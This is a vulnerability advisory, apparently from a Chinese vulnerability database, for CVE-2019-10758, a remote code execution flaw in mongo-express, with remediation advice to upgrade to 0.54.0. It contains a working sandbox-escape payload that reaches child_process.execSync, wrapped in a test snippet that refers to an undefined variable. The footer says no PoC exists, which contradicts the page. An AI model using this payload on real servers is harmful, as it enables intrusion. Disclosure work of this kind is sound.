mongo-express远程代码执行漏洞(CVE-2019-10758)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

## Overview [mongo-express](https://github.com/mongo-express/mongo-express#readme) is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3 Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment. ## PoC by Jonathan Leitschuh ``` # MacOS this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator') it('should not be executable', function () { const test = ` this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString()) `; const result = bson.toBSON(calculatorTest); }); ``` ## Remediation Upgrade `mongo-express` to version 0.54.0 or higher. ## References - [GitHub...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息